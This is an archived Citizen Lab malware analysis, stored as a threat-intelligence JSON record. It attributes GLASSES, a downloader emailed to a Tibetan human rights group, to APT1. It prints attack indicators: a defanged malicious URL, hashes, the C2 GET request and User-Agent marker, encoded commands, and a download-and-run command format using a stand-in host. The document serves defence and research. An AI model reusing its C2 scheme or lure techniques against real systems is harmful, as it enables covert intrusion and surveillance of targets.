{
	"id": "5586881a-14c9-477f-8512-298ebbed0182",
	"created_at": "2026-04-06T00:20:09.820306Z",
	"updated_at": "2026-04-10T03:38:09.984515Z",
	"deleted_at": null,
	"sha1_hash": "02c97fa0e3b6e1f0d17db437c123c5363ff98d18",
	"title": "APT1's GLASSES - Watching a Human Rights Organization - The Citizen Lab",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 506061,
	"plain_text": "APT1's GLASSES - Watching a Human Rights Organization - The\r\nCitizen Lab\r\nArchived: 2026-04-05 12:53:11 UTC\r\nKey Findings\r\nMalware (“GLASSES”) sent in 2010 is a simple downloader that is closely related to the GOGGLES\r\nmalware described by Mandiant in their APT1 report.\r\nGLASSES was sent in a highly targeted email to a Tibetan human rights organization, demonstrating that\r\nAPT1 is involved in more than just industrial and corporate espionage, with attacks against civil society\r\nactors documented as early as almost three years ago.\r\nThe methods and infrastructure of this attack are consistent with those described in Mandiant’s APT1\r\nreport, e.g., spear phishing against an English-speaking target, having an infrastructure of compromised\r\nmachines for malware distribution and C2 operation.\r\nThe GLASSES sample analyzed shares a large percentage of code and an operational C2 server with a\r\nGOGGLES sample, indicating that they are from the same source.\r\nThe GOGGLES sample we discovered that communicates to the shared C2 server is not exactly the same\r\nas described in the Mandiant report, indicating that GLASSES may be a variant of GOGGLES, and that the\r\nsoftware has been used while under active development.\r\nOverview\r\nOn February 19, 2013, Mandiant released a report titled “APT1: Exposing One of China’s Cyber Espionage\r\nUnits.” [Offsite-PDF] The report describes the activities of one cyber espionage group, APT1 (referred to as\r\n“Comment Crew” or “Byzantine Candor” in other reports), that has targeted a large number of organizations in a\r\nwide range of industries, stealing terabytes of data. 
Mandiant traced APT1 operations to China and makes the case\r\nthat the group may in fact be the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s\r\n3rd Department, also known as Unit 61398.\r\nIn early 2011, Citizen Lab was forwarded a malicious email containing a link to a malware sample for analysis, as\r\npart of our ongoing study of targeted cyber threats against human rights organizations. This email, sent almost a\r\nyear earlier to the head of an organization focused on Tibetan rights and issues, contains malware that is very\r\nsimilar to one program described in Appendix C (“The Malware Arsenal”) of Mandiant’s report, which they\r\nnamed “GOGGLES.” (We have previously reported on other targeted attacks against Tibetan organizations, such\r\nas the recent PlugX RAT and the LURK variant of Gh0st RAT.)\r\nThe malicious program analyzed at Citizen Lab shares both a large percentage of code and the same command and\r\ncontrol (C2) infrastructure as the program described in the APT1 report. We are calling this program GLASSES\r\nbecause it is related to GOGGLES and uses a compromised eyeglasses storefront website as its C2 server.\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 1 of 11\n\nGLASSES is particularly interesting because it demonstrates that APT1 is not limited to attacks against industrial\r\nand commercial organizations, but also targets civil society organizations. It is unlikely that our study’s participant\r\nis the only civil society target of APT1 malware, although no attacks against civil society organizations have been\r\ndocumented in the Mandiant report. Both Mandiant and Shadowserver have included a Tibetan-themed domain in\r\ndomain lists, supporting the idea that other organizations are targeted, but have not included any information on\r\nthe details of Tibetan-related APT1 operations. 
A Bloomberg article mentions that the nonprofit organization\r\nInternational Republican Institute was compromised by the same group in June 2011, but no technical details of\r\nthe attack were released.\r\nCivil society organizations such as the study participant that received this email are frequently and persistently\r\nattacked just the same as corporate and government targets. However, reporting on such attacks by security\r\nvendors is less common: these vendors generally lack visibility into civil society, as civil society organizations\r\noften do not have the resources to buy their security products or services. This may be the reason for the lack of\r\nreference to civil society targets in Mandiant’s APT1 report, as it is likely that Mandiant has better visibility into\r\ncorporate and government targets through their client base.\r\nTargeted Email and Infection\r\nOn March 17, 2011, we were forwarded an email sent on April 28, 2010 from a Yahoo! webmail address to\r\nsomeone at one of our participating organizations. The email is written in English, and references the recipient’s\r\norganization by name.\r\nSome details of the email immediately flag it as suspicious: the name in the email address is “Nate Herman” (see\r\nFigure 2 below for full header details and other information) although the email is signed “Martin Lee.” The\r\nforwarded email included full headers, so we were able to obtain more information about its origin (Yahoo!\r\nincludes the sender’s source IP in the headers when an email is sent over the webmail interface). In this case, the\r\noriginating IP is 69.95.255.26, which is registered to One Communications, Inc. 
/ EarthLink Business, and is very\r\nsimilar to IPs used in a similar attack — demonstrating that this attack is not isolated, and the IPs are likely being\r\nreused for other malware campaigns.\r\nThis email contains a link to a ZIP file located at hxxp://tcw.homier.com/attchments/details.zip (MD5:\r\n6fb3ecc3db624a4912ddbd2d565c4995). The homier.com domain belongs to Homier Distributing Company, Inc.\r\nand appears to have been compromised. A search for this subdomain can find other instances of malware hosted\r\nthere, such as that detailed in ThreatExpert’s report on 87e840054d37f83c5077e685d45c0abb indicating a file in\r\n/images/update.bin, and another malicious program getting the file /attachments/SalaryAdjustment.zip.\r\nThe details.zip file contains a single executable file, Save my Tibetan wife – for [targeted organization’s\r\nname].exe (MD5: 356fc183b7e73a74383fdb1e74f84709) which pretends to be a folder by using the same icon as\r\na folder:\r\nWhen the executable is run, it deletes itself, then creates and opens a folder of the same name with a PDF\r\ndocument (filename: details.pdf, MD5: a3cd8f45eef80eacb6bf3d2415139efa) in it. From the user’s perspective,\r\nthis is almost indistinguishable from opening an actual folder:\r\nThe PDF is not malicious, but it is damaged: the header and EOF markers have been deleted, and there is no xref\r\ntable. As a result, Adobe Reader and other PDF viewing programs are unable to open it.\r\nThe content of the PDF implies that it was repurposed from a job posting regarding a position relating to public\r\nhealth in association with USAID in Nepal. 
Objects that are not displayed have information about what appears to\r\nbe a real job posting, and the author metadata seems to be from a real person at the organization. Because the\r\ncontent is not directly related to the subject matter of the email, it suggests that it is not meant to be opened and\r\nmay have been reused from a previous attack against a different organization.\r\nMeanwhile, the original program drops an executable named spkptdhv.exe (MD5:\r\n80a45ce5d3cc416fffdafa101bdf002c) in %temp%, and adds itself to the registry in order to restart on reboot.\r\nMalware – “GLASSES”\r\nThe dropped executable connects to a website and downloads a single HTML page. The site appears to be part of\r\na legitimate website for an eyeglasses company, suggesting that it has been compromised. We contacted the\r\nhosting provider of the compromised site in March 2011, but never received any response.\r\nThe HTTP request includes a marker in the User-Agent string, indicating that it was sent by this malware:\r\nGET /ewpindex.htm HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)\r\nHost: ewplus.com\r\nCache-Control: no-cache\r\nThe marker string has two parts, separated by a period. The first part (“Clj26Dbj”) is an encoded version of the\r\ncomputer’s name, presumably for tracking which machines at an organization are infected. The second part\r\n(changed to “XYZ” here) appears to be a campaign code, as the original is the standard abbreviation for the\r\norganization to which it was sent.\r\nThe marker may be in the User-Agent string so that it shows up in the access log on the web server, indicating that\r\nthe attacker has access to these logs and may monitor them for signs of infection. 
As the User-Agent string shows\r\nup in web access logs, it would be simple for an attacker to monitor for compromised computers connecting to the\r\nC2 server this way.\r\nThe command from the compromised web page (ewpindex.htm) looks like this:\r\nThe accessed page contains an anchor with an encoded command in it. The malware looks for the string in the\r\nanchor tag with the target NewRef, and then decodes it to a command. The link itself is empty, so that there is\r\nnothing to click on and it is invisible on the page. Another page on the same site, aboutus.htm, contains a different\r\ncommand although the URL is not apparently used by this binary.\r\nThe commands found on the website are:\r\nPage         | Encoded  | Decoded\r\newpindex.htm | KVHc6Gcj | s:120\r\naboutus.htm  | KVHe6ibj | s:30\r\ntable 1\r\nLooking through the malware code, it is evident that this is a simple downloader with only two commands. The\r\ncommands are:\r\nCommand Character | Command          | Description                                                          | Example\r\ns                 | Sleep            | Sleep for specified number of minutes                                | s:120\r\nr                 | Download and Run | Download and run executable binary at specified location on the web | r:http://www.foo.com/bar.exe\r\ntable 2\r\nThe C2 server is still live, but it has the same sleep command as it did when we reported the compromise to the\r\nhosting provider approximately two years ago. It is unknown whether this means the attackers have lost control\r\nover the compromised server, or whether it is still live — for example, it may require manual intervention to\r\nchange the page to a download command, and this may only happen when logs of an infected computer appear\r\nagain. 
The attackers may choose only to provide a malicious second stage program for GLASSES to download\r\nand execute when they have verified the target, or may only keep the download link live for a very short amount\r\nof time to discourage its discovery and analysis. At no point in our investigation of this malware did the command\r\nstring change from this sleep command.\r\nComparison to GOGGLES, an APT1 Attack\r\nIn “Appendix C: The Malware Arsenal” of the Mandiant APT1 report, the authors describe and give names to 49\r\ndifferent malicious programs. One of these is called “GOGGLES” — a simple downloader that is controlled via\r\nencoded markers in files accessed over HTTP.\r\nThe C2 communication method, commands, and particularly the data encoding method in GOGGLES are very\r\nsimilar to the sample we analyzed. The connection was initially noticed due to a shared string used in decoding\r\nmethods, and the presence of the same two commands for each program. Follow-up code analysis confirmed that\r\nthese programs share much of the same code, and use the same C2 server. It is very likely that GOGGLES is a\r\nlater version of GLASSES.\r\nDecoding Algorithm\r\nIn GLASSES, the URL for the webpage and the campaign code are not found in plain text inside of the binary.\r\nThe program keeps the information stored in an encoded format that is not immediately recognizable. 
However,\r\nthe decoding function uses a very recognizable string, “thequickbrownfxjmpsvalzydg,” which is how we were\r\nable to quickly identify this malware as being possibly related to APT1:\r\nThis decoding method is mentioned in the Mandiant report multiple times, used by the GOGGLES malware as\r\nwell as three other malicious programs (SWORD, NEWSREELS, and LONGRUN).\r\nSharing C2 Domain with GOGGLES\r\nWhen we first analyzed the sample in March 2011, we searched a private malware database for related network\r\ntraffic and found the following results:\r\nAt the time, the significance of the file 4poval.jpg was not immediately clear. Upon casual inspection, it seems to\r\nbe an image that is related to the website content:\r\nThe Mandiant report describes GOGGLES sending an initial HTTP GET request for a JPEG image file with an\r\nembedded control command. The command offset is stored six bytes before the end of the file, and the command\r\nhas a magic value (an arbitrary string of bytes) to indicate that it is actually a GOGGLES command file, and not\r\njust image data:\r\nChecking the 4poval.jpg file (still available on the website as of February 2013) shows that the GOGGLES\r\ncommand data is present.\r\nSix bytes from the end of the file is the four byte offset 00 00 09 68. The bytes ff 02 b7 bc at offset 0x968 are the\r\nmagic value described in the Mandiant report (in reverse order due to byte ordering), confirming that this is a\r\nGOGGLES control file.\r\nSince the two malware programs use the same domain for command and control and share much of the same code,\r\nit is very likely that these programs are used by the same group. 
The GOGGLES code is more sophisticated than\r\nthe GLASSES code: in addition to a more effective method of hiding the command data, it also has more\r\ncountermeasures to protect against reverse engineering and hide itself on the infected system. For this reason, it is\r\nvery likely that GOGGLES is a later version of GLASSES.\r\nAnalysis of GOGGLES Sample\r\nA search using the VirusTotal Malware Intelligence service for the MD5 of the sample found in our network\r\ntraffic database found a copy of the GOGGLES program that downloads the command image from this C2 server.\r\nComparing this GOGGLES binary 64c47ead2e95e4033f0f1f1fedaf15cf (which uses the above image file to\r\nreceive commands) to the behavior described in the Mandiant report does not result in a 100% behavior match.\r\nThe User-Agent string does not exactly match the one described in the report, but uses one similar to the\r\nGLASSES sample. After the normal user-agent information, there are two strings, which likely correspond to the\r\nencoded computer name (“Alj26Bbj”) and campaign code (“RUCK”).\r\nThe User-Agent string that is different from that described in the Mandiant report shows that the behavior of\r\nGOGGLES was changing while in use, strengthening the idea that GLASSES may be an earlier development of\r\nthe same malware family.\r\nConclusions and Recommendations\r\nThe description of GOGGLES in the Mandiant report and its attribution to APT1 has given us enough information\r\nto attribute a similar attack to them as well. This attack, which we are calling GLASSES, took place in April 2010\r\nand was targeted against a Tibetan human rights organization. 
This demonstrates that APT1 is interested not only\r\nin industrial and commercial targets, but civil society organizations as well.\r\nThe sample of GLASSES we were sent has many technical similarities to Mandiant’s description of GOGGLES,\r\nincluding specific strings used for encoding and decoding. While this suggests that the two programs are related,\r\nthere are other possible explanations for this connection, such as an attack found in the wild and repurposed by a\r\nnew group. By searching for related network traffic, however, we were able to discover a file on the GLASSES\r\nserver which contains GOGGLES control information — a clear indication that the malware is being operated by\r\nthe same group.\r\nUsing VirusTotal’s Malware Intelligence service, we were able to find a copy of the specific GOGGLES binary\r\nusing the same C2 server. Analysis of this GOGGLES sample revealed behavior that was similar but not exactly\r\nthe same as the behavior described in the Mandiant report. The difference in behavior between the GOGGLES\r\nversions suggests that the malware was under active development during the time period of the attacks. Because\r\nGLASSES is a simpler version of GOGGLES with the same commands but fewer countermeasures against\r\nreverse engineering and analysis, it is likely that GLASSES is an earlier version of GOGGLES.\r\nThe vector for the GLASSES attack we observed was consistent with the modus operandi for APT1 described by\r\nthe Mandiant report: a targeted email sent to an English-speaking target, using a set of compromised computers as\r\njumping points. 
This type of threat is very dangerous to civil society organizations as well as industrial and\r\ncommercial targets.\r\nAs with other targeted email attacks, organizations can protect themselves against this kind of attack by treating\r\nemail with caution, especially email with attachments or links. A more detailed set of recommendations for\r\ndefending against email and other threats can be found at Citizen Lab’s page on Recommendations for Defending\r\nAgainst Targeted Cyber Threats.\r\nSource: https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/"
	],
	"report_names": [
		"apt1s-glasses-watching-a-human-rights-organization"
	],
	"threat_actors": [
		{
			"id": "dabb6779-f72e-40ca-90b7-1810ef08654d",
			"created_at": "2022-10-25T15:50:23.463113Z",
			"updated_at": "2026-04-10T02:00:05.369301Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"APT1",
				"Comment Crew",
				"Comment Group",
				"Comment Panda"
			],
			"source_name": "MITRE:APT1",
			"tools": [
				"Seasalt",
				"ipconfig",
				"Cachedump",
				"PsExec",
				"GLOOXMAIL",
				"Lslsass",
				"PoisonIvy",
				"WEBC2",
				"Mimikatz",
				"gsecdump",
				"Pass-The-Hash Toolkit",
				"Tasklist",
				"xCmd",
				"pwdump"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "dcba8e2b-93e0-4d6e-a15f-5c44faebc3b1",
			"created_at": "2022-10-25T16:07:23.816991Z",
			"updated_at": "2026-04-10T02:00:04.758143Z",
			"deleted_at": null,
			"main_name": "Lurk",
			"aliases": [],
			"source_name": "ETDA:Lurk",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b",
			"created_at": "2022-10-25T16:07:23.480196Z",
			"updated_at": "2026-04-10T02:00:04.626125Z",
			"deleted_at": null,
			"main_name": "Comment Crew",
			"aliases": [
				"APT 1",
				"BrownFox",
				"Byzantine Candor",
				"Byzantine Hades",
				"Comment Crew",
				"Comment Panda",
				"G0006",
				"GIF89a",
				"Group 3",
				"Operation Oceansalt",
				"Operation Seasalt",
				"Operation Siesta",
				"Shanghai Group",
				"TG-8223"
			],
			"source_name": "ETDA:Comment Crew",
			"tools": [
				"Auriga",
				"Cachedump",
				"Chymine",
				"CookieBag",
				"Darkmoon",
				"GDOCUPLOAD",
				"GLOOXMAIL",
				"GREENCAT",
				"Gen:Trojan.Heur.PT",
				"GetMail",
				"Hackfase",
				"Hacksfase",
				"Helauto",
				"Kurton",
				"LETSGO",
				"LIGHTBOLT",
				"LIGHTDART",
				"LOLBAS",
				"LOLBins",
				"LONGRUN",
				"Living off the Land",
				"Lslsass",
				"MAPIget",
				"ManItsMe",
				"Mimikatz",
				"MiniASP",
				"Oceansalt",
				"Pass-The-Hash Toolkit",
				"Poison Ivy",
				"ProcDump",
				"Riodrv",
				"SPIVY",
				"Seasalt",
				"ShadyRAT",
				"StarsyPound",
				"TROJAN.COOKIES",
				"TROJAN.FOXY",
				"TabMsgSQL",
				"Tarsip",
				"Trojan.GTALK",
				"WebC2",
				"WebC2-AdSpace",
				"WebC2-Ausov",
				"WebC2-Bolid",
				"WebC2-Cson",
				"WebC2-DIV",
				"WebC2-GreenCat",
				"WebC2-Head",
				"WebC2-Kt3",
				"WebC2-Qbp",
				"WebC2-Rave",
				"WebC2-Table",
				"WebC2-UGX",
				"WebC2-Yahoo",
				"Wordpress Bruteforcer",
				"bangat",
				"gsecdump",
				"pivy",
				"poisonivy",
				"pwdump",
				"zxdosml"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434809,
	"ts_updated_at": 1775792289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/02c97fa0e3b6e1f0d17db437c123c5363ff98d18.pdf",
		"text": "https://archive.orkl.eu/02c97fa0e3b6e1f0d17db437c123c5363ff98d18.txt",
		"img": "https://archive.orkl.eu/02c97fa0e3b6e1f0d17db437c123c5363ff98d18.jpg"
	}
}